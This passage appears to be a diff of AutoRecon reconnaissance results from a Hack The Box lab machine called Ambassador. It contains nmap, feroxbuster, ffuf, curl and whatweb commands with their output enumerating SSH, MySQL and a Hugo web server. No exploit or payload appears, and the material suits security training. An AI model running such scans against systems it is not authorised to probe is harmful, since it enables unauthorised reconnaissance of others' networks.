SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:02\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:43 2023 -- 1 IP address (1 host up) scanned in 294.24 seconds
```

71
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-22-ssh/Nmap SSH.md Normal file
View File

@@ -0,0 +1,71 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.058s latency).
Scanned at 2023-01-24 07:27:44 EST for 1s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
| ssh2-enum-algos:
| kex_algorithms: (9)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:27:45 2023 -- 1 IP address (1 host up) scanned in 1.87 seconds
```

32
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-3306-mysql/Nmap MYSQL.md Normal file
View File

@@ -0,0 +1,32 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3306 "--script=banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.038s latency).
Scanned at 2023-01-24 07:27:44 EST for 108s
PORT STATE SERVICE REASON VERSION
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 61
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, ConnectWithDatabase, ODBCClient, SupportsTransactions, LongColumnFlag, FoundRows, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ; E\x18{q7/Y&NBxIZ\x132(&Y
|_ Auth Plugin Name: caching_sha2_password
| banner: [\x00\x00\x00\x0A8.0.30-0ubuntu0.20.04.2\x00?\x00\x00\x00"Rcm%P
| \x19Z\x00\xFF\xFF\xFF\x02\x00\xFF\xDF\x15\x00\x00\x00\x00\x00\x00\x00\x
|_00\x00\x009i1\,\x1C`P\x02g{+\x00caching_sha2_password\x00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:29:32 2023 -- 1 IP address (1 host up) scanned in 108.73 seconds
```

3
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Curl Robots.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.10.11.183:80/robots.txt
```

174
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Curl.md Normal file
View File

@@ -0,0 +1,174 @@
```bash
curl -sSik http://10.10.11.183:80/
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_curl.html):
```
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79"
Accept-Ranges: bytes
Content-Length: 3654
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Ambassador Development Server</title>
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="">
<meta name="generator" content="Hugo 0.94.2" />
<meta name="robots" content="noindex, nofollow">
<link rel="stylesheet" href="/ananke/css/main.min.css" >
<link href="/index.xml" rel="alternate" type="application/rss+xml" title="Ambassador Development Server" />
<link href="/index.xml" rel="feed" type="application/rss+xml" title="Ambassador Development Server" />
<meta property="og:title" content="Ambassador Development Server" />
<meta property="og:description" content="" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://example.org/" />
<meta itemprop="name" content="Ambassador Development Server">
<meta itemprop="description" content=""><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Ambassador Development Server"/>
<meta name="twitter:description" content=""/>
</head>
<body class="ma0 avenir bg-near-white">
<header>
<div class="pb3-m pb6-l bg-black">
<nav class="pv3 ph3 ph4-ns" role="navigation">
<div class="flex-l justify-between items-center center">
<a href="/" class="f3 fw2 hover-white no-underline white-90 dib">
Ambassador Development Server
</a>
<div class="flex-l items-center">
<div class="ananke-socials">
</div>
</div>
</div>
</nav>
<div class="tc-l pv3 ph3 ph4-ns">
<h1 class="f2 f-subheadline-l fw2 light-silver mb0 lh-title">
Ambassador Development Server
</h1>
</div>
</div>
</header>
<main class="pb7" role="main">
<article class="cf ph3 ph5-l pv3 pv4-l f4 tc-l center measure-wide lh-copy mid-gray">
</article>
<div class="pa3 pa4-ns w-100 w-70-ns center">
<h1 class="flex-none">
Recent Posts
</h1>
<section class="w-100 mw8">
<div class="relative w-100 mb4">
<article class="bb b--black-10">
<div class="db pv4 ph3 ph0-l no-underline dark-gray">
<div class="flex flex-column flex-row-ns">
<div class="blah w-100">
<h1 class="f3 fw1 athelas mt0 lh-title">
<a href="/posts/welcome-to-the-ambassador-development-server/" class="color-inherit dim link">
Welcome to the Ambassador Development Server
</a>
</h1>
<div class="f6 f5-l lh-copy nested-copy-line-height nested-links">
Hi there! This server exists to provide developers at Ambassador with a standalone development environment. When you start as a developer at Ambassador, you will be assigned a development server of your own to use.
Connecting to this machine Use the developer account to SSH, DevOps will give you the password.
</div>
<a href="/posts/welcome-to-the-ambassador-development-server/" class="ba b--moon-gray bg-light-gray br2 color-inherit dib f7 hover-bg-moon-gray link mt2 ph2 pv1">read more</a>
</div>
</div>
</div>
</article>
</div>
</section>
</div>
</main>
<footer>
<div>
<p>
Ambassador Inc.
</p>
</div>
</footer>
</body>
</html>
```

42
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Directory Buster.md Normal file
View File

@@ -0,0 +1,42 @@
```bash
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt):
```
200 GET 1l 242w 75263c http://10.10.11.183/ananke/css/main.min.css
200 GET 21l 101w 1230c http://10.10.11.183/index.xml
200 GET 155l 305w 3654c http://10.10.11.183/
403 GET 9l 28w 277c http://10.10.11.183/.html
403 GET 9l 28w 277c http://10.10.11.183/.hta
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd
403 GET 9l 28w 277c http://10.10.11.183/.htaccess
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.txt
403 GET 9l 28w 277c http://10.10.11.183/.hta.txt
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.txt
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.html
403 GET 9l 28w 277c http://10.10.11.183/.hta.html
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.html
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.php
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.php
403 GET 9l 28w 277c http://10.10.11.183/.hta.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.asp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.asp
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.aspx
403 GET 9l 28w 277c http://10.10.11.183/.hta.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.aspx
403 GET 9l 28w 277c http://10.10.11.183/.htpasswd.jsp
403 GET 9l 28w 277c http://10.10.11.183/.hta.jsp
403 GET 9l 28w 277c http://10.10.11.183/.htaccess.jsp
200 GET 92l 143w 1793c http://10.10.11.183/404.html
301 GET 9l 28w 317c http://10.10.11.183/categories => http://10.10.11.183/categories/
301 GET 9l 28w 313c http://10.10.11.183/images => http://10.10.11.183/images/
200 GET 155l 305w 3654c http://10.10.11.183/index.html
301 GET 9l 28w 312c http://10.10.11.183/posts => http://10.10.11.183/posts/
403 GET 9l 28w 277c http://10.10.11.183/server-status
200 GET 18l 22w 645c http://10.10.11.183/sitemap.xml
301 GET 9l 28w 311c http://10.10.11.183/tags => http://10.10.11.183/tags/
```

3
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Known Security.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
```

117
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Nmap HTTP.md Normal file
View File

@@ -0,0 +1,117 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:27:43 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.036s latency).
Scanned at 2023-01-24 07:27:44 EST for 18s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-errors: Couldn't find any error pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-malware-host: Host appears to be clean
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-generator: Hugo 0.94.2
|_http-chrono: Request times for /; avg: 196.43ms; min: 171.38ms; max: 209.87ms
|_http-date: Tue, 24 Jan 2023 12:27:51 GMT; 0s from local time.
| http-feed:
| Spidering limited to: maxpagecount=40; withinhost=ambassador.htb
| Found the following feeds:
|_ RSS (version 2.0): http://ambassador.htb:80/index.xml
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-vhosts:
|_128 names had status 200
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; xml: 1
| /ananke/css/
| css: 1
| /posts/welcome-to-the-ambassador-development-server/
| Other: 1
| Longest directory structure:
| Depth: 2
| Dir: /posts/welcome-to-the-ambassador-development-server/
| Total files found (by extension):
|_ Other: 2; css: 1; xml: 1
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-title: Ambassador Development Server
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ambassador.htb
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!normalize.css v8.0.0 | MIT License | github.com/necolas/normalize.css*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
| /*!TACHYONS v4.12.0 | http://tachyons.io*/
|
| Path: http://ambassador.htb:80/ananke/css/main.min.css
| Line number: 1
| Comment:
|_ /*!TACHYONS v4.9.1 | http://tachyons.io*/
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-headers:
| Date: Tue, 24 Jan 2023 12:27:52 GMT
| Server: Apache/2.4.41 (Ubuntu)
| Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
| ETag: "e46-5e7a7c4652f79"
| Accept-Ranges: bytes
| Content-Length: 3654
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-php-version: Logo query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_Credits query returned unknown hash 4e8656a1e2c09ff4135b58519f82a327
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:02 2023 -- 1 IP address (1 host up) scanned in 18.76 seconds
```

11
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/Virtual Host Enumeration.md Normal file
View File

@@ -0,0 +1,11 @@
```bash
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
``````bash
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt):
```
```

78
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/whatweb.md Normal file
View File

@@ -0,0 +1,78 @@
```bash
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_whatweb.txt):
```
WhatWeb report for http://10.10.11.183:80
Status : 200 OK
Title : Ambassador Development Server
IP : 10.10.11.183
Country : RESERVED, ZZ
Summary : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], MetaGenerator[Hugo 0.94.2], Open-Graph-Protocol[website], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Hugo 0.94.2
[ Open-Graph-Protocol ]
The Open Graph protocol enables you to integrate your Web
pages into the social graph. It is currently designed for
Web pages representing profiles of real-world things .
things like movies, sports teams, celebrities, and
restaurants. Including Open Graph tags on your Web page,
makes your page equivalent to a Facebook Page.
Version : website
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 24 Jan 2023 12:27:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 02 Sep 2022 01:37:04 GMT
ETag: "e46-5e7a7c4652f79-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1310
Connection: close
Content-Type: text/html
```

3
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Services/Service - tcp-80-http/wkhtmltoimage.md Normal file
View File

@@ -0,0 +1,3 @@
```bash
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
```

26
HTB/ambassador/results/10.10.11.183/scans/_commands.log Normal file
View File

@@ -0,0 +1,26 @@
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
curl -sSikf http://10.10.11.183:80/robots.txt
curl -sSik http://10.10.11.183:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"

101
HTB/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt Normal file
View File

@@ -0,0 +1,101 @@
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.078s latency).
Scanned at 2023-01-24 07:22:49 EST for 335s
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
